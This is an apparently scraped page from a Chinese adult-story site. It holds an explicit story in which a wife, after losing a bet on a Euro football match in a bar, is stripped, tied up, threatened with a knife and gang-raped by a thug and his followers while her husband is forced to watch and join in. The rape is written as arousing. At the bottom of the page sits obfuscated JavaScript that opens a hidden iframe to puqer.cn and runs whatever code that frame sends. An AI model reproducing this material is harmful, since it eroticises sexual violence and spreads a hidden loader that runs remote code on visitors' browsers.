字幕網- 每日更新 永久免費



  淩晨2 點,酒吧已經陸陸續續來了好多客人。今天是歐洲杯之夜荷蘭與葡萄
牙的比賽。雙方都唯有取勝才能獲得小組出線資格。ANDY擠過人群,好不容易找
到了一個吧台的座位,點了一杯尊尼獲加,冰塊都還沒來得及和酒相融,他便急
不可耐地大口喝了下去……對於他來說最近非常不順利——工作上他剛失去一個
大客戶;而家裏老婆因為他半夜看球的事情和他剛吵過架,一氣之下他跑出家門
來到酒吧看球;而他在歐洲杯上最喜歡的球隊如今已經淪落到必須背水一戰方有
機會晉級的境地……他並不想繼續沉寂在這種悲傷的氣氛中去看球,唯有借酒消
愁才能得到片刻的愉悅,此時手中已經是第三杯威士忌了,他哪管這些,一口悶
了下去,此時的他已經有些微醺……
  「一個人看球?」一個悅耳的女聲再他耳邊響起,他轉頭望去,一個穿著低
胸吊帶衫的美女出現在他眼前。白色的吊帶衫胸口並不能算很低,但是胸前兩顆
大球早已呼之欲出,白淨的皮膚雖不及吹彈可破但也算冰雪之肌。瓜子臉長發,
耳朵邊兩個大大的銀色耳環更是在昏暗的酒吧間裏顯得格外亮眼……「你……你
怎幺來了?」ANDY滿臉狐疑,這位靚麗的大美女其實就是他的愛妻小芸。
  「哼……就你可以來,我不能來嘛?」說著小芸起了身,在ANDY眼前轉了一
圈。
  Andy這才發現今天的小芸打扮並不一般,除了白色的吊帶衫顯得她的胸呼之
欲出外,下麵的裙子也頗有亮點。銀閃閃的亮片式的超短裙,不僅光豔,而且有
點彈性的材質把整個屁股包的凹凸有致,腳下還有一雙銀色的高跟涼鞋,約莫12CM
的跟,讓本就有165 身高的她顯得更是高挑。
  「小芸,這是……」ANDY幾乎不敢相信自己的眼睛。
  「好啦,我知道你不開心嘛,一個人跑出去,我找了這條街好幾間酒吧才找
到你的……」
  「小芸,對不起,我惹你生氣了」Andy道歉到。
  「沒事啦,晚上是我不好,其實我也不是不讓你看球嘛,隻是我怕你影響工
作,前幾天你才失去一個客戶,要是最近因為看球再影響工作,那就麻煩了……」
小芸娓娓道來。
  「對,小芸,你說的是,幹脆我們回家吧……我……」ANDY覺得有些愧疚。
  「算來,來都來了。再說,我今天可是特別打扮一下出來的哦,我還是第一
次來酒吧呢,就當給我見識見識吧。我明天公司請半天假,你也晚點去吧,我知
道你喜歡荷蘭,這場比賽也許是最後……」
  「別……別這幺說,還是有希望的」
  說著兩個人手握著手,又和好如初了,看著時間已經來到了2 :40,電視上
主持人正在播報兩隊的首發名單,ANDY開始把視線集中到了電視上。旁邊的小芸
有趣沒趣地打量著酒吧四周,足球對她來說完全不感興趣,隻是不想今天掃了老
公的興致。就在這時,她感到一隻大手摸在了她的腰上,顯然這隻手不是老公的,
她向著摸她的方向轉過去,引入眼簾的是一個彪形大漢,嚇的她下意識一把想推
開這個男人,可是有巧不巧的是正好推到了那人拿著啤酒杯的另一隻手,一大杯
啤酒瞬時倒在了這個男人的身上。
  「你他媽的賤人……」那個人勃然大怒,原來摸著小芸腰的手抽了回來,一
把打了小芸一個耳光。
  「你幹嘛!」ANDY這時看到自己愛妻居然給人扇了耳光,也從吧台椅上彈了
起來。他本想立即向這個男人揮拳過去,隻奈何小芸的位置正好擱在了他們兩個
之間。擔心這樣誤傷到愛妻,便改還擊為怒斥。「你丫的幹嘛打我老婆!」「原
來這賤人是你老婆,你看看,她把我的啤酒全弄灑在我衣服上了……」「老公,
是他先非禮我的……」剛被打了一耳光的小芸此時臉上紅紅的,眼眶上還含著淚。
  「我哪裏非禮你了?」那彪悍一邊說還一邊指指周圍,「你們有人看到沒?」
「沒有」「沒看到」「哪有」這時周圍好幾個人起哄起來。
  「算了,算了,這杯我請……」這時吧台的服務員也過來勸架,同時而在Andy
耳邊耳語了幾句,「先生,吃點虧就吃點虧吧,那個人可是附近的大流氓,你看
邊上幾個起哄的都是跟班,你和他們吵會吃虧的。這人家裏很有背景,這個區的
警察都拿他們沒辦法……」
  「不行,不是酒的問題,這賤人把我衣服弄濕了,要現在要她負責……」那
個流氓顯然是故意找茬。
  「不就是賠錢嘛,你要多少,我給你」Andy想想酒保說得有理,算了,還是
別和這些流氓見識了。就當吃虧是福吧。
  「不是錢不錢的問題,老子來看球的,本來心情很好,現在這臭逼影響了我
看球的心情……」
  「那你想怎樣?」ANDY道「讓我心情好就行了,不如這樣,讓她幫我全身舔
一邊,順便做個口活……給我個痛快,我就不追究了。」那流氓說道。「好」,
「大哥說的對」,「就這幺辦」周圍幾個小弟又開始起哄道。
  「你們這幫流氓」惱羞成怒的ANDY那管什幺,再也忍不住了,一拳就向那流
氓打去。可是,他那敵得過眾人。幾個小弟看自己老大被襲擊了,立馬上去圍毆
ANDY,沒幾下ANDY已經被打趴在地,而那幾個人顯然不想就此收手,繼續用腳又
踩又踢。
  「別打了……」這是小芸叫了起來「你們這一幫人欺負我們兩個,我還是一
女流之輩,你們算男人嗎?」
  「偶喲,小妞開始幫自己男人了嘛」流氓帶著猥褻的笑容說道。
  「你不要我幫你口交嘛,我做就是了」小芸說道。
  「不要……」Andy剛想說話,這是又被人踢了一腳,鼻孔裏已經冒出兩行血
出來了。
  「不過,要我口交有條件的,看你夠不夠爺們。」小芸繼續道「這有意思,
你說說看……」那流氓覺得有些好玩了,臉上的表情也比剛才放鬆很多。
  「夠爺們咱就和老娘賭一場,要是贏了,我給你口交。要是輸了,你們幾個
都給我爬著滾出這裏。」
  「有點意思,不過呢,你這樣賭還不夠本賠剛才的事情,剛才你弄濕了我的
衣服,你老公還打了我一拳,所以你還要加碼」那流氓到「怎樣?」「你輸了不
光要給我口交,還要當著眾兄弟的麵給我幹一炮。」「這怎幺行」小芸聽到他這
幺說,有些露怯了。
  「不敢賭就別逞能,乖乖現在幫我口交完了,你們兩個就可以離開了……」
「賭就賭」小芸想,不賭也要給他們羞辱,說不定賭一把還有機會。「怎幺賭?」
  「很簡單,你壓哪隊贏」
  「荷蘭隊」小芸想都沒想,她肯定站在老公這邊。
  「好,那要是荷蘭隊不贏,你就得給我幹。」流氓說道。
  「別被他騙了」這時ANDY艱難地爬了起來,「這等於葡萄牙贏了或者兩隊打
平我們都要輸,不公平」
  「那好,打平了也可以算你贏」那流氓說道,「但是要加碼。每進一球,這
妞要脫一件衣服。」
  「好,就這幺說定了」小芸這時說道。
  「不行,老婆……」
  「沒事的」小芸堅定的說道。她是這幺想的,不就脫衣服,大不了也就脫光,
但是這樣她還有三分之二的機會贏得這個賭局,所謂的讓他們滾出去也隻是說說
的,她隻想贏了盡快擺脫就是了。
  「球進啦……」這時電視裏突然傳來主持人的大叫,「上半場11分鍾,荷蘭
隊羅本右路內切回傳給範德法特,範德法特一腳勁射,現在是1 :0 ,荷蘭隊領
先!」
  「耶……」聽到這裏整個酒吧都炸開鍋了,原本在這事情附近的球迷還靜靜
的看著這些流氓和這一男一女怎幺處理事情,轉眼間大家都忘記了這些,荷蘭隊
的球迷立刻歡慶起來,甚至有些原本支持葡萄牙的球迷,因為看到幾個流氓欺負
別人,也轉而開始支持其荷蘭隊了。
  這時ANDY和他老婆小芸也相擁慶祝,沒想到剛說定賭局,荷蘭隊已經領先了。
現在一球在握,隻要堅持整場,甚至被對方再進一球,他們也能就此脫身。
  「喂,喂,你們兩別這幺得意,才剛開始呢。」流氓說道「還有呢,剛才說
了,進一球你就給我脫件衣服……」
  聽到這個,原本還很開心的小芸霎時有尷尬起來,不過小芸也知道不兌現剛
才的諾言是不行的。於是她先脫了自己的吊帶衫。好在她裏麵還穿著文胸。隻是
現在上半身的大部分肌膚已經裸露在外了。小芸白皙有光滑的皮膚,看著都讓人
著迷。
  然而,之後的進程並不順利,小芸正脫吊帶衫的時候,C 羅一腳射門打在了
門柱上,過了三分鍾,荷蘭隊失誤有險些釀成大禍……,而另一邊,德國已經1
比0 領先丹麥了,這個時候,作為荷蘭迷的ANDY知道,今天即使自己能全身而退,
他支持的那支荷蘭隊恐怕也很難出線了。
  就在忐忐忑忑間,熬過了漫長的15分鍾,場麵上雖然荷蘭隊也有威脅,但是
大家都感到荷蘭此時的1 球並不保險。就再此時,之間佩雷拉送出直傳,C 羅單
刀……這是ANDY隻能期待C 羅還會像上場那樣「巴神附體」,然而,事與願違,
C 羅一腳推射,穩穩把球送進了球網。1 比1 ,雙方打平了。
  厄運的是不僅葡萄牙扳回一球,同時也意味著ANDY的老婆又要脫衣服了,顯
然小芸已經不能再脫上身了,於是她隻能脫去自己的裙子,這下她隻剩下了胸罩
和內褲了。此時小芸和ANDY隻能權當是在海邊穿著比基尼遊泳了……之後的時間
對他們夫妻倆來說依然痛苦不堪,C 羅有一個頭球偏出……C 羅帶球進禁區偏出
……好不到熬到了上半場結束,這時酒保拿來兩杯檸檬水給Andy和小芸,好讓他
們清醒一下,然而小芸並沒有這個心思,因為剛才大家因看著球,她穿著三點式
並不怎幺顯眼,但到了中場休息,幾乎所有的目光都聚焦在了她的身上。她隻能
麵向吧台,這樣留給大多數看到的就是一個背影,然而小芸身材很好,臀部又豐
滿,即使背對著大部分人,但大家依然可以看到小芸的翹臀……
  好不容易熬到了下半場,大家的目光終於可以回到電視上。比賽再次開始,
又是C 羅接到納尼傳球射門被封堵,而後荷蘭也有幾個機會但也沒把握住,到了
比賽60分鍾的時候,又是C 羅射門被波斯蒂擋入了球網,這時小芸的心一下子揪
了起來,甚至她都開始想解胸罩了……好在是越位了,雖然小芸不明白什幺是越
位,但是她知道這球不算。就這樣的煎熬一直持續著。眼看比賽來到了70多分鍾,
離結束的時間越來越接近了,小芸終於覺得快熬出頭的時候,C 羅再次出現在電
視屏幕中,隻見他一腳勁射再次破門,葡萄牙2 :1 領先了。這時酒吧裏一片死
寂,隻有部分葡萄牙死忠和那個流氓及跟班在歡慶。而這時的小芸已經癱倒在地。
她知道現在不僅要脫去胸罩,還意味著,如果接下來一刻鍾左右的時間荷蘭不進
球,那她將成為那個流氓的「盤中餐」了……隻見那流氓一把揪著小芸的頭發,
不僅把她拉了起來,還一把拉上吧台……「臭婊子,給我站上吧台脫,脫給所有
人看……」「脫……脫……脫……」個別好事的人這時已經忘了正義感,更想著
看這位美女的酥胸。要知道小芸那又白又大的奶子隻能被胸罩遮住小半,在場的
男人不管有意無意,潛意識裏都有窺探究竟的欲望。想看看這個女人脫了胸罩後
的雙峰是否依然如此傲立。
  Andy這時想幫忙解圍,可是被幾個跟班僅僅嗯在了椅子上不得動彈。無奈小
芸此時隻能脫去胸罩,一對雙峰瞬時彈了出來,小芸想用手趕緊捂氣胸部,可是
那流氓早有預判,一把抓住小芸的手反坳在背後,隨後問一個跟班要來了繩子把
小芸手反綁好,小芸此時上身就這樣完全赤裸裸的麵對著所有男人,而大家也再
也不關心比賽了,大家都看著小芸的胸部,被反綁以後這對胸部反而更有型了,
85D 的胸圍,即使遠離吧台的人也能看得一清二楚。小芸再也沒有站著的力氣,
腿一軟,跪在了吧台之上,心裏又是悔恨又是委屈,不禁兩行淚留了出來。
  「哭什幺哭,等一下好好你可得服侍老子……」而ANDY隻是緊緊盯著屏幕,
他希望奇跡能發生,由於被多人製服著,他甚至連看屏幕都很困難,他隻能在心
裏默默祈禱。可是時間一分一秒逝去,荷蘭隊一點沒有扳回比分的跡象。到了傷
停補時,他甚至連看得勇氣都沒有了。而那流氓則已經開始動手動腳起來,由於
小芸雙手被綁著,她隻能仍由那流氓捏弄著胸部。她試圖靠扭動身子來逃避,一
開始還是有點擺脫之勢,可是沒多久一個小跟班一把從背後架住她,使得她連掙
脫的可能性都沒有。
  聽到電視裏比賽結束,那流氓再也沒有顧忌,一把撕掉了小芸的內褲,用手
指狠狠插到小芸的陰戶裏。小芸又是難過,卻又有些難言之感,從來沒有被人強
暴過的她,感覺陰戶裏的淫水突然不受控製般的如潮水湧出,這讓她感到羞愧難
當。麵對著一個很厭惡的男人,下麵居然不聽話,流出的水比和老公做愛時還多。
  這時那流氓得意的伸出手指說道:「大家快看,這賤逼水這幺多……」而那
些兄弟把ANDY綁在跳鋼管舞的鋼管上,隨後都跑到老大的身邊。受到老大的示意,
那幾個跟班都開始輪流用手插小芸的陰戶。
  「真的哎」,「水好多」,「浪貨」……而原來酒吧的觀眾,有些怕惹麻煩
已經退場了,而有個別好事之徒居然也加入進「狂歡」的隊伍。小芸被他這些人
拉下吧台,弄到一個小桌子上,撬開了嘴巴,大流氓把自己的雞巴插進小芸嘴裏,
同時拿了把刀在小芸臉上架著。「你隻要敢咬或者不用心幫我口交,我就把你臉
割破了。」,受到威脅的小芸其實早已不關心這些,她隻希望能趕緊結束這個噩
夢,腦子裏也沒有抵抗的意識。反倒開始用心幫那流氓舔弄起來。由於小芸天資
聰明,口交那些幾乎不用教就會,雖然平時和老公口交並不多,但倒也頗得要領。
  弄得那流氓甚是銷魂。甚至都有射的衝動。
  然而那流氓畢竟也不是等閑之輩,此時抽出龜頭,用手一捏,原本即將爆發
之勢瞬時化滅,隨後操起那話兒,抬起小芸雙腿,一下將那話兒插了進去。小芸
頓時感覺下麵無比刺痛。原來那流氓不僅人高馬大,那SIZE也非常了得,小芸那
小小的陰戶被撐得有撕裂之痛。好在小芸剛才出了不少水,這會兒被這大雞巴插
進去,潤滑倒是足夠。抽插幾下間便慢慢適應。
  而那流氓並不著急,玩起「九淺一深」,弄的小芸欲火逐漸越燒越旺,甚至
開始呻吟起來——啊……啊……不……受不了……了……想……想……「想什幺
呢?說出來」那流氓道「想……想要……」「想要什幺?快說」
  「想要雞巴……」
  「說清楚點,想要誰的雞巴」那流氓一點不給小芸顏麵,當著她老公麵非要
弄個刨根問底。
  「想要……要……你……的雞巴……」小芸這時幾乎忘記了老公的存在……
「操死你……」啪……啪……啪……一邊說,一邊傳來下體間碰撞的聲音。
  少頃,那流氓把小芸翻了個身,讓小芸跪在桌子上,同時示意幾個跟班扶住
小芸的身體,並讓其中一個解開褲子,把自己的雞巴塞到小芸嘴裏讓她口交。而
那流氓則從後方繼續插小芸。
  「你們這幫狗日的……啊……」ANDY在那邊撕心裂肺的叫著,聲音非常大。
那流氓聽著覺得非常煞風景,離開小芸的身體,從地上撿起剛才的撕碎的內褲往
小芸下身塞了幾下,隨後拿著濕漉漉的內褲,跑到ANDY身邊,先給ANDY幾個耳光,
隨後把那內褲塞進了ANDY的嘴裏,好讓他不再叫喚。
  「讓你嚐嚐你老婆被我們操過流出來的淫水」那流氓對著ANDY說道。
  隨後又回到小芸身邊繼續抽插。
  「臭婊子,讓你老公看看我是怎幺插你的,我要把精液射到你的身體裏去…
…」一邊說著,一邊拿流氓抽插得更快了,啪~ 啪~ 啪~ 啪~ 啪~ 啪~ 啪~ 啪~
啪~ 啪~ 啪~ 啪~ 啪,隨著節奏加快,流氓再也不控製,隻見他一陣抽搐,把精
液完全射了進去。隨後抽出雞巴,讓旁邊一個小弟接力去幹小芸。而之前雞巴塞
小芸嘴裏的那人也開始射出,小芸滿滿的一嘴精液從嘴角不斷流出。
  那流氓稍稍休息了一下,隨後跑到ANDY身邊,解開固定在鋼管的繩子,把他
拉到小芸身邊……
  「你給我好好看看這你女人是怎幺給我們幹的……」andy努力想撇開頭不看,
可是自己還被綁著,頭被死死對著小芸的陰戶方向,他隻能看著自己老婆被那幾
個流氓輪流幹著,這時已經有好幾個已經射在了小芸的體內,這時隻見小芸陰戶
不斷有雞巴抽動,又不斷有精液被帶出。知道每個人都完成射精以後才算消停。
但是那流氓似乎並不滿足,抓著ANDY的頭發把他的頭湊到小芸兩腿之間,取出塞
嘴裏的內褲,隨後用刀抵著小芸的臉說道「不想讓你女人破相,那就乖乖去舔你
女人的陰戶,把我們射在裏麵的精液都舔掉……」
  起先ANDY不從,但看著小芸那痛苦的臉,最後還是就範。無奈隻得含著淚舔
起自己老婆被好多男人操過的陰戶,陰戶裏一股腥臭的精液味幾乎讓他窒息、嘔
吐……這時酒吧為數不多的窗戶已經充滿了光線,外麵的陽光已經照耀進來,ANDY
看著新一天的陽光,心裏卻是淌著淚雨……


上一篇:Sena Nagakura永倉せな_[58P] 下一篇:(轉)我的舞蹈老師
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};